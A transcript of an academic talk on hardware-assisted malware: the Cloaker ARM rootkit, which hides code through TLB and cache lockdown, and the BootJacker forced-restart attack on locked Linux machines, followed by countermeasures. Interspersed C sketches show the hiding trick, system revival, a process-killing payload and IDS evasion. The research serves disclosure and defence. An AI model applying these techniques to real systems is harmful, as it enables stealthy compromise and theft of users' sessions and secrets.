>>: Can you explain why the VMM detector can detect the VMBR but not Cloaker? Because in some sense a VMBR runs like Cloaker.
>> Francis David: You're right. You're right.
So the reason that Cloaker is not detectable by those VMM detectors is that, at least for this TLB sizing, for example, when we use those locked TLB entries, the locked TLB entries on the ARM are in an exclusive TLB. So you're not using up the normal TLB entries that are available to the OS.
So there are eight TLB entries that are specifically reserved for being locked down, and those are not used by the OS, and they can be used by Cloaker. So the OS will still see no changes in the TLB entries.
>>: But there are a handful of ways in the VMM detector (inaudible); we're not just talking about one vector in the detector that cannot be used (inaudible), right?
>>: I think he's right. I think specifically what you're saying is, yeah, x86 VMM detectors are not appropriate for catching ARM, right?
>> Francis David: Yes.
>>: If you read (inaudible), that's basically what they say. And I think you've got exactly the same problem here. You've basically built a VM rootkit. It's an ARM-specific VM rootkit instead of an x86-specific rootkit, but it is a VM rootkit. Every single one of the techniques you've talked about is detectable in the same sense (inaudible) your interrupt thing, your TLB. Surely if I was going to write the paper on how I write a VMM detector for the ARM, one of the things I'd say is, well, I should write through all of the locked TLB entries first.
>> Francis David: So you're right. The thing that we're arguing about here is essentially -- I'm arguing that there's one thing you can do in order to detect VMM-based rootkits. So you can put your finger on this thing and say, "I will do a check for a VMM." And there are definite ways to do that. So there's one thing you can do and it can detect all VMM rootkits.
>>: I think Hal's (phonetic) argument in the (inaudible) paper was that there isn't one thing that
you can do to detect every rootkit, but there are enough things that -- it is a cat and mouse game,
and inevitably you will be able to find -- any rootkit that is in existence, you will be able to find.
That's Hal's (phonetic) argument.
>> Francis David: But there's one thing you can definitely do in order to detect that virtualization -- that you're running in a virtual machine, right? You can do TLB sizing. There's one thing you can do.
So my argument is essentially to say that there is no one thing that you can do in order to totally cover the whole class of hardware-based malware. For the VMM rootkits, if you do TLB sizing, you can say, I can detect that I'm running in a virtual machine, and that's it. I've come up with a detection scheme. There's no further question on this topic anymore, right? I've placed my finger on that and I'm done.
>>: That's really not what they said.
>> Francis David: You can discuss this offline.
Yes?
>>: So just to clarify, since there are eight of these lockable TLB slots, you can try to do a read-and-write test, if you're the OS, to see whether all eight are available to you?
>> Francis David: You're right. So what you're essentially saying is that there has to be
hardware-level integrity checks. You have to check the integrity of the hardware in some sense,
the hardware state, and that's what we argue for as well.
So we're kind of saying here that it's not sufficient to check the integrity and the sanity of the OS.
You also have to go and check the integrity of the hardware as well. So you have to consider the
system as a whole, both the software and the hardware parts of it.
So we have this argument about checking for the flipped bit. So let me just go and give you
another alternative way of doing this control flow subversion that doesn't use the flipped bit
technique.
So like I said and I've been stressing here, individual vulnerabilities aren't the topic of this talk. So
I'm not trying to say that this particular vulnerability exists, I'm trying to say there's this class of
hardware-based malware that's possible, and I'm essentially arguing that there's no one thing that
you can place your finger on and say this is going to detect all hardware-based rootkits. Those
(inaudible) techniques are probably going to be ineffective.
So the other technique I'm going to show you now uses the hardware architecture of the cache. There are separate data and instruction caches, and we use the cache line lockdown support in the ARM in order to do this different attack.
So what we do is we take a line in the data cache, lock it down, and we lock down the correct
values, the OS instructions, in the data cache, and in the memory we actually replace those OS
instructions with our malicious instructions.
And once we do this, essentially you have the malicious code that's getting executed because it
goes to the instruction cache, but if the OS or any detection technique tries to do a checksum or a
signature check, it will not see the malicious code because all of those operations go through the
data cache and that's locked down. So, again, this is another case where I'm exploiting a feature
of the hardware, the architecture, in order to hide the malware.
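As pseudo-steps (the CP15 c9 lockdown programming is core-specific, so the helpers here are hypothetical wrappers), the hiding trick looks like this:

```c
/* Sketch of the cache-lockdown hiding trick: the clean OS instructions stay
 * locked in the data cache, so integrity checks that read memory through
 * the D-cache see clean code, while instruction fetches get the malicious
 * word now sitting in DRAM. The three helpers are hypothetical wrappers
 * around core-specific CP15 c9/c7 operations. */
extern void lock_dcache_line(const volatile void *addr);        /* CP15 c9 D-cache lockdown */
extern void write_dram_bypassing_dcache(volatile unsigned long *addr,
                                        unsigned long val);     /* e.g. via an uncached alias */
extern void invalidate_icache_line(const volatile void *addr);  /* CP15 c7 I-cache invalidate */

void hide_patch(volatile unsigned long *os_code, unsigned long evil_insn)
{
    unsigned long clean = *os_code;        /* 1. pull the clean word into the D-cache */
    (void)clean;
    lock_dcache_line(os_code);             /* 2. pin that line so it is never evicted */
    write_dram_bypassing_dcache(os_code, evil_insn); /* 3. patch DRAM only */
    invalidate_icache_line(os_code);       /* 4. force the I-cache to refetch the patch */
}
```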
Yes?
>>: Do you see any way (inaudible) the checker?
>> Francis David: I'll talk about the mitigation techniques in a couple of slides.
So moving on to countermeasures, what we're essentially saying here is that there are lots of these possible ways you can have hardware enable malicious software to operate. And we have to have some sort of way to completely check the integrity of the hardware.
So one way to do this from software -- you still need some hardware support in order to anchor a root of trust, but once you can verify the integrity of these checkers, you can build this framework where you have each driver export a checking function that checks the integrity of its associated hardware, and this essentially gives you a way to check the integrity of various components of the hardware. And the drivers are the right places to put these checkers, because the drivers are what really understand the hardware. So this is a software-based technique.
The other things that are possible are -- yes?
>>: Would you give us an example (inaudible)?
>> Francis David: So, for example, in the driver for the processor, it would essentially have a checker that checks the integrity of the state in the processor, and that would check for this flipped bit, for example. So our framework essentially just uses return values in order to signal or flag that something is wrong.
So these are functions that just check some hardware. There's no specific way you need to write this function, as long as it returns yes or no, whether or not the hardware matches the state it expects.
>>: Can you use (inaudible) a checker to check the checker's integrity?
>> Francis David: Yes. So the check management --
>>: The check (inaudible).
>> Francis David: So like I said before, we need some sort of a root of trust from the hardware, like a TPM kind of system.
Okay. So I'll quickly go on to the other thing as well.
So this is the last slide I had on this thing. So you can also do some hardware-based techniques
in order to detect such rootkits.
And the last couple of notes I had here were that if you have a more sophisticated version, you can also start interpreting OS structures and do more damage. And the thing about this rootkit is that it's really hard to write, because it interacts with the architecture at a really low level, so it definitely discourages script kiddies.
So I'm going to move on to the next section of my talk, and I should be able to finish in half an
hour, and that's about the other tool that we did which compromises systems using forced restart.
So the observation here is that volatile memory is not really volatile. Alex Halderman is going to present a paper at USENIX Security in a couple of months where he shows a technique to extract encryption keys from memory after pulling out the DIMMs, putting them in another PC, and just imaging the memory. And it's not really a new thing. As far back as 1979 people have looked at this problem, and they've shown that you can actually have this memory persist for a whole week, in fact.
And the thing here is you can also revive a complete system. And this is a paper that we wrote.
It was published at the USENIX Technical Conference in the middle of last year. And we showed
that we can use this volatile memory preservation property to revive a system that's been locked
up and it's been reset by a watchdog timer. And we essentially did it for reliability reasons, but it's
much more interesting to look at it from a security perspective.
And what I'm going to show you in the next couple of slides is kind of an illustration of how this attack would happen. So say Alice is working on her computer. She has a couple of applications opened up. There's a banking application -- essentially she's opened up secure connections to various places. There's a VPN that's running and so on. And she walks away from her computer temporarily and locks the screen. And Trudy walks in, and she has brief access to the computer, and it's a locked screen. What does she do?
So what Trudy does is she has BootJacker. She forces the computer to restart in some manner,
either unplug the power, put it back in, or use some OS support, and plugs in BootJacker as an
alternate boot medium. And what BootJacker is able to do is it's able to revive the complete
existing system that was running before. And since it starts up at a lower level, now it can go and
switch off any sort of access-control mechanism that was in place. So it can disable the
screensaver lock, for example. So that kind of gives the overview of the attack. We didn't really
do it for Windows like I showed there, we implemented it only for Linux right now.
So the requirements for this whole attack are: you have to have physical access to the system. Secrets have to be in memory; there's no point in trying to revive the system if there's no encryption key or there's nothing interesting in memory. And there has to be some way of restarting the system.
On the Linux platform you have a SysRq key combination. So it's a magic key sequence that you
hit in order to immediately restart the computer. You can also power cycle it. And you also have
to have an alternate boot path. So you should be able to boot from a different device. And you
can have that support either from the BIOS, or if there's a boot loader, the boot loader could also
let you do booting from a different device. And the memory shouldn't be significantly clobbered
by that BIOS. So if BIOS for this booting up goes and erases all of memory, the attack is
worthless. And it targets net space operating systems.
So let's look at the -- assuming that all the other requirements are okay, let's look at the BIOS
memory clobber behavior.
Yes?
>>: So is there a specific system that was considered to be more secure than it actually is, and this research has uncovered that it is not that secure? When I lock my machine, I assume that if somebody has physical access, they can do something, just because I have read about USB-based malware. Maybe there was -- what is it?
>> Francis David: So say, for example, you were using -- I mean, you're aware of all such -- I
mean, you are aware of theft, essentially, and you rely on encrypted disks and you rely on VPN
connections, tunnels and everything, in order to kind of really protect your information, even in the
face of theft.
So you assume in some sense that once I have an encrypted disk and I've locked my screen and
everything, I've hibernated my system and I've walked away, that if somebody steals my laptop,
they still won't be able to get to my disk because when they boot it up back again you need to
enter your password again in order to get to your data.
So what I'm showing here is that you can still get to secure data as well by reviving the whole system. The problem isn't new. Like I said before, Alex is going to have a demonstration at USENIX Security where he has a way of retrieving the keys.
What I'm showing here is a way to revive the whole system. There's no need to look for any keys
at all because you can just use the application directly. So you don't have to search for anything.
You can revive the complete system.
>>: So the commercial systems that do hibernate and have the encrypted disk -- I don't know, I
think we have one -- do they not encrypt memory?
>> Francis David: For hibernated systems? Some hibernated systems on the Linux kernel,
some of them do, some of them don't. The newer ones do. In this case we didn't actually even
look at hibernated systems, we just looked at a screensaver lock kind of protection. So as long
as it's just sleeping, you open it up, there's a screensaver lock, and your keys are still in memory.
So if there's authentication -- if you walk away and it still requires authentication in order to get
your keys, then our system is ineffective against such architectures.
Yes?
>>: Would it be sufficient to protect your system to, when the screen is locked, to dump the keys
and then have the log-in authentication regenerate the keys?
>> Francis David: Yes. So the attack we're essentially exploiting here is essentially ability to
access secrets in memory. So if there's no secrets in memory, it's worthless.
So in order to study the BIOS behavior for clobbering memory, we wrote a tool that's on a CD. You can boot it up and it will write a pattern to memory, reboot, and then check if the pattern still exists.
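A minimal sketch of such a probe follows (my reconstruction; the boot-CD environment is assumed to give flat, unpaged access to physical memory):

```c
/* Sketch of the BIOS memory-clobber test: before rebooting, stamp a
 * recognizable pattern across extended memory; after the reboot, count
 * how many stamps survive. Assumes flat physical addressing. */
#include <stdint.h>

#define PATTERN 0xDEADBEEFu
#define STRIDE  (4096 / sizeof(uint32_t))   /* one probe word per 4 KB page */

void stamp(uint32_t *base, uint32_t *end)
{
    for (uint32_t *p = base; p < end; p += STRIDE)
        *p = PATTERN;                        /* run this, then reboot */
}

unsigned survivors(uint32_t *base, uint32_t *end)
{
    unsigned kept = 0;
    for (uint32_t *p = base; p < end; p += STRIDE)
        kept += (*p == PATTERN);             /* pages preserved across the reboot */
    return kept;
}
```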
We ran it in a whole bunch of systems, and interestingly, Dell laptops totally wipe out their
memory for some reason. The attack is totally ineffective against any Dell laptop. And I have a
Dell laptop.
But ThinkPads, all ThinkPads, even the newest ones, preserve a lot of memory so there's very
little memory that gets erased.
>>: (Inaudible) actually Vista BitLocker requires (inaudible) and requires memory to get over it (inaudible) on the BIOS.
>> Francis David: Dell does (inaudible).
>>: (Inaudible).
>> Francis David: So the memory that I'm talking about here is only extended memory, everything above the 1 megabyte boundary. The first 640 K of memory is always used by the BIOS while it's running, and the BIOS totally messes it up.
On the Linux platform, the first eight megabytes are reserved for things like ISA card DMA, so the Linux kernel doesn't really use up that memory, which is why we're able to revive the system.
All the clobbered memory in the first 640 K doesn't matter.
So these are a bunch of different laptops and a desktop that we tested this on.
And so there are two aspects to this attack, right? The first is how do you revive the software part of it, and the second is how do you revive the hardware part of it, because it is a reset, and the hardware also gets reset.
So, the software resuscitation. The goal is essentially to resume execution of the software environment, and what we do is essentially come up with a processor context that we just restore on the CPU, which enables the system to continue running.
And for our attack right now we assume that we're using the Linux SysRq magic key to reboot the
system. It's, by default, enabled on all (inaudible) based systems and a couple of other
distributions as well. So you hit "alt SysRq B" and it immediately reboots the system.
And what we do here is in the revival code we go through the stacks, find the stack in which the
reboot handler was called. So this is an operating-system-specific attack, so it needs to know the
layout of the system and so on.
And it finds a stack and it essentially creates a context that makes it seem like this reboot function
returned without actually rebooting. And we verified that if you do that, the system actually
continues to work.
And so while reviving the system, we will also find the page tables for the process that was
running and enable those page tables so that the system doesn't crash as soon as you restore
this context on the processor.
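Put together, the software resuscitation reduces to something like the following sketch; every structure and helper here is a hypothetical stand-in, since the real code is tied to the exact Linux kernel layout:

```c
/* Sketch of BootJacker's software resuscitation as described in the talk:
 * scan kernel stacks for the frame of the reboot handler, rebuild a CPU
 * context that looks like that call returned, point CR3 at the interrupted
 * process's page tables, and jump back in. All names are hypothetical. */
struct cpu_context { unsigned long ip, sp, flags, cr3; };

extern unsigned long find_reboot_frame(void);         /* walk stacks for the reboot handler's caller */
extern unsigned long page_tables_of_current(void);    /* page directory of the interrupted process */
extern void load_context(const struct cpu_context *); /* restores registers; never returns */

void resuscitate(void)
{
    struct cpu_context ctx;
    ctx.sp    = find_reboot_frame();        /* stack as if the reboot call is returning */
    ctx.ip    = *(unsigned long *)ctx.sp;   /* saved return address on that stack */
    ctx.flags = 0x200;                      /* x86 EFLAGS: interrupts enabled */
    ctx.cr3   = page_tables_of_current();   /* avoid faulting right after the jump */
    load_context(&ctx);
}
```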
So for the hardware resuscitation, we looked at -- I'm not going to say that we revived all the hardware on the system. We looked at some set of hardware, and the thing to note here is that sometimes Linux automatically revives some devices for you. For example, the disk: we didn't really write any code for that. It's part of the internal recovery mechanisms of the operating system.
So Linux automatically reinitializes the controller and it revives the disk, so we don't have to do
anything for the disk.
Even the network cards recover after a little bit of time. What we did was speed that up a little bit by forcing the timer (inaudible) faster.
For the display, if it's a Linux-based system you can always switch to the text console before running the BootJacker tool. Once it revives the system, it's back in the text console, and then you go back to the graphical console, and that reinitializes the display.
And the parts we actually had to write code for were re-enabling the FPU -- this is on x86 -- and
re-enabling the interrupt controller, the system timers, and the keyboard and mouse.
This is all very architecture specific, and it is not done automatically by the OS.
Some things we can rely on the OS to fix; some things we can't.
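To give a flavor of those architecture-specific steps, here is a hedged sketch of two of them on
x86: clearing the EM and TS bits in CR0 to re-enable the FPU, and reprogramming the legacy
8259A interrupt controllers. The port numbers and init words are the standard PC values, but
this is my illustration, not the actual BootJacker code:

    #include <stdint.h>

    static inline void outb(uint16_t port, uint8_t val) {
        __asm__ volatile("outb %0, %1" : : "a"(val), "Nd"(port));
    }

    static void revive_fpu(void) {
        uint32_t cr0;
        __asm__ volatile("mov %%cr0, %0" : "=r"(cr0));
        cr0 &= ~((1u << 2) | (1u << 3));   /* clear EM and TS bits */
        __asm__ volatile("mov %0, %%cr0" : : "r"(cr0));
        __asm__ volatile("fninit");        /* reset FPU to a known state */
    }

    static void revive_pic(void) {
        outb(0x20, 0x11); outb(0xA0, 0x11); /* ICW1: begin initialization */
        outb(0x21, 0x20); outb(0xA1, 0x28); /* ICW2: interrupt vector offsets */
        outb(0x21, 0x04); outb(0xA1, 0x02); /* ICW3: master/slave cascade wiring */
        outb(0x21, 0x01); outb(0xA1, 0x01); /* ICW4: 8086 mode */
        outb(0x21, 0x00); outb(0xA1, 0x00); /* unmask all IRQ lines */
    }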
We wrote a couple of payloads for this thing as well. One is a simple payload that kills a
process, which we used to kill the screensaver process. We wrote another payload that spawns
a root shell, which invokes the shell command on the system with superuser privileges. That
shell ends up on an unused virtual console on the Linux system, and you can switch among the
virtual consoles in Linux using a couple of keyboard combinations.
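A process-killing payload of this sort might look like the following hypothetical sketch, which
walks the kernel's task list and forces a SIGKILL on a process by name. The helpers follow
2.6-era Linux kernel internals; a real payload has to match the exact layout of the running
kernel, so treat every name here as an assumption:

    #include <linux/sched.h>
    #include <linux/signal.h>
    #include <linux/string.h>

    /* Kill every process whose command name matches, e.g. the
     * screensaver. Illustrative; not the actual BootJacker payload. */
    static void kill_by_name(const char *name) {
        struct task_struct *p;
        for_each_process(p) {
            if (strcmp(p->comm, name) == 0)
                send_sig(SIGKILL, p, 1);  /* 1 = forced, bypass checks */
        }
    }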
And to evaluate BootJacker, for the correctness tests we ran a lot of applications and interrupted
them in the middle to see if they resumed execution correctly. We did DCC (inaudible),
JPEG encoding, and AES encryption, and all of these applications continued to run and completed
properly after the reboot.
The other thing we looked at was, of course, since we revive the whole system, we get
access to any program that's running. So just to prove the point we ran a number of
security-sensitive programs. You open up an SSH connection to somebody else; once you reboot,
the connection is still open. Or a web browser session: if you have a banking session open, you
can reboot, the screen lock is gone, and you still have the banking session open. We did it with a
VPN connection, and we also did it with Linux software-based disk-encryption technologies.
And the key point to note here is that, unlike key retrieval attacks -- where you need to go
looking for a particular key, figure out how to use it, and build completely separate support to do
anything useful with those keys -- there's no need to tailor this attack for a particular key size or
any such detail, because we essentially (inaudible) the whole system. Everything is available to
us.
And as for countermeasures, you might think that securing the boot process would be enough. If
you look at the requirements I listed before, there is a requirement for an alternate boot path. But
I would argue that securing the boot path, or even just doing memory clearing in the BIOS, doesn't
really help that much, because you can do a memory-imaging attack just like Alex did. He took
out the DIMMs, put them in a different machine, and revived the system.
So you can always move the memory (inaudible) to a different computer. ECC is interesting
because we never managed to get ECC memory to retain its contents. It was always reset.
And Alex also reports the same behavior.
And a hardware-based solution is probably something that's more appropriate here. There's a
colleague at the University of Illinois (inaudible) who is actually going to be here for a
postdoc sometime soon. He's working on this notion of a secure core processor which
essentially holds all the secrets. So as long as you make sure there are no secrets in volatile
memory, we can essentially avert this attack.
Yes?
>>: (Inaudible) countermeasure and just have the other authentication factor be something like
the user's password and encrypt all of the memory, then there's no key in memory.
>> Francis David: Okay. If you're essentially tying your log-in authentication to the memory
encryption, yes, that's definitely a possibility as well.
>>: Now, it will work (inaudible).
>> Francis David: Assuming it's a single-user desktop, that solution definitely works. As long as
you encrypt the whole system and it's all tied to your authentication ID, you're fine.
So essentially, the thing we're exploiting, like I said before, is that as long as the secret is in
memory, we can get to it. If there's nothing in memory, if it's all encrypted, we can't get to it.
>>: So the hardware that you're taking advantage of is this interrupt that lets you restart the
machine (inaudible).
>> Francis David: Yes. That, and the hardware behavior -- the memory preservation behavior,
the (inaudible) behavior.
So we're at the conclusion slide, but I have a couple of slides after that as well, and I have time.
What I've been talking to you about today is a couple of exploits from what I'd call a class of
security gaps that exist in the boundary between the architecture and the system software. And
similar attacks can also exist in other operating systems and on other hardware. We haven't
looked at them, but other people are doing work on this as well. There's a recent news article
about somebody using system management mode on x86 to do something similar, and they've
been talking about the same idea we explored with Cloaker, where they run a separate
operating system totally divorced from the existing operating system. Essentially, system
designers should consider such possible attacks when they're designing secure systems.
So before I conclude I just want to give you a brief overview of some of the other work that I've
been doing for my Ph.D.
I did a lot of work in OS dependability. We first looked at using exceptions for error handling.
We also looked at watchdog-based recovery from OS lockups, which is the work that kind of
led to the BootJacker attack. When we propose it as a security issue it seems to raise more
eyebrows, but we did talk about it at USENIX (inaudible).
And the other thing we're doing is building an operating system out of hardware-isolated and
micro-rebootable components with explicit state management. When you're talking about
micro-rebooting components in a microkernel, you have to be careful about the state that's
maintained in each of these components.
If you take a component such as the network stack and you arbitrarily reboot it when there's an
error in it, what happens is that all the existing applications using networking fail, because all
the state is lost. So in our system there's a networking stack that's completely restartable,
because all the state for each individual session is isolated in separate regions of memory --
these green things here -- and the state is mapped in and out on demand using hardware
support.
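A hedged sketch of that state-isolation idea: each session's state lives in its own region that
survives a component micro-reboot, and the fresh component re-attaches to it instead of starting
from scratch. The real system maps the regions in and out with MMU support; this table of
pointers and all the names here are just my illustration:

    #define MAX_SESSIONS 64

    struct session_state {
        int id;     /* e.g., a TCP connection's identity */
        /* ... per-session protocol state ... */
    };

    /* These regions live outside the component and survive its reboot. */
    static struct session_state *regions[MAX_SESSIONS];

    /* After a micro-reboot, the new network stack instance re-attaches
     * to every preserved session instead of reinitializing it. */
    static void reattach_sessions(void (*restore)(struct session_state *)) {
        for (int i = 0; i < MAX_SESSIONS; i++)
            if (regions[i] != 0)
                restore(regions[i]);
    }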
So those are a couple of other things we've been working on, and the idea wasn't (inaudible).
We're hoping to get the final paper published somewhere else.
As far as future work, I've shown you a bunch of these vulnerabilities, and I'm sure there are lots
more possible in multicore architectures; there are a lot of debug features in these systems. I
was reading, for example, about the SPARC architecture. It provides support for injecting faults
and simulating faults, and it will take a processor core offline if a certain number of faults happen
in the system.
So if such a multicore system can, for example, take a core offline, and malware can exploit that
to make the OS think it has offlined the core while the malware actually runs on that core, that's
a possible attack vector. So there are possible things there.
We haven't looked at it in too much detail, but it's something worth looking at. The same goes for
exploiting hardware virtualization support. And now that you can also do computation on GPUs,
you can think of ways that malware could run on the GPU as well.
I mean, they're all going to have the NVIDIA cards, but not everybody is going to use those
NVIDIA cards for general-purpose computation.
So there's a wealth of possible avenues here for malware to exploit, and we need to look at
defenses for such attacks. It mostly has to be a collaborative hardware/software solution.
And the other thing I've been toying with is a way to evade intrusion detection systems that are
running on a computer by having user-space processes interact directly with the hardware. If
it's memory-mapped hardware, you could use the TLB tricks I was talking to you about earlier to
give a user-space process direct access to the hardware. And by not using the OS API, which is
where the monitoring is done for typical intrusion detection systems, that could give you a little
bit more stealth in some sense. That's another idea I've been toying with.
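The talk's approach relies on TLB manipulation from inside a rootkit; as a much simpler
stand-in to show what direct user-space access to memory-mapped hardware looks like, here is
a sketch using Linux's /dev/mem. The physical address is a placeholder, and this still goes
through the OS once at setup time, so it's only an illustration of the end state:

    #include <fcntl.h>
    #include <stdint.h>
    #include <sys/mman.h>
    #include <sys/types.h>
    #include <unistd.h>

    int main(void) {
        off_t mmio_phys = 0xFEC00000;  /* placeholder device address */
        int fd = open("/dev/mem", O_RDWR | O_SYNC);
        if (fd < 0)
            return 1;
        /* Map one page of device registers into this process. */
        volatile uint32_t *regs = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                                       MAP_SHARED, fd, mmio_phys);
        if (regs == MAP_FAILED) { close(fd); return 1; }
        uint32_t v = regs[0];  /* talk to the device, bypassing the OS API */
        (void)v;
        munmap((void *)regs, 4096);
        close(fd);
        return 0;
    }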
And I guess I'm pretty close to the end of the time, so I can take more questions.
(Applause)
No questions? Okay. Thank you very much.